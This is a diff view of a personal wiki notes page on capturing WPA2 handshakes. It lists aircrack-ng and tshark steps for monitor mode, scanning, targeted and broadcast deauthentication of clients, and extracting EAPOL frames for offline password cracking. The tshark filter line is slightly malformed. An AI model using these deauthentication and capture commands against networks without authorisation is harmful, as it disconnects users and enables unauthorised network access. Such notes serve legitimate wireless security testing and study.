Ben's notes

Linux, Unix, network, radio...

User Tools

Site Tools

Trace:
capture_wpa_handshake

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
capture_wpa_handshake [2014/06/12 20:08] admincapture_wpa_handshake [2021/10/09 15:14] (current) – external edit 127.0.0.1
Line 1: Line 1:
 {{tag>[security crack wpa wpa2 handshake kali]}} {{tag>[security crack wpa wpa2 handshake kali]}}
-~~TOC~~ 
  
 =====Capture WPA2 handshake===== =====Capture WPA2 handshake=====
Line 101: Line 100:
 [*] anonce: [*] anonce:
     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07     3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-    99 5B 29 78 B5 FF DB 5B 35 CC 2B 53 C0 50 A0 45+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] snonce: [*] snonce:
     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-    DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96 4E+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
 [*] Key MIC: [*] Key MIC:
     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
 [*] eapol: [*] eapol:
     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00     01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-    01 C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 +    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --  
-    AC DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
     04 01 00 00 0F AC 02 0C 00     04 01 00 00 0F AC 02 0C 00
  
Line 167: Line 166:
 wlan0 Intel 6235 iwlwifi - [phy0] wlan0 Intel 6235 iwlwifi - [phy0]
  (monitor mode enabled on mon0)</code>  (monitor mode enabled on mon0)</code>
-  * Find nearest wireless networks. <code># airodump-ng mon0+  * Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>' <code># airodump-ng mon0
  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
  
Line 205: Line 204:
  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1  14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e            4</code>
-  * Dump packets from target channel. <code># airodump-ng --channel 11 --write channel11 mon0</code>+  * Dump packets from target channel. <code># airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0</code>
   * Wait for handshake... or   * Wait for handshake... or
   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>
   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>
   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1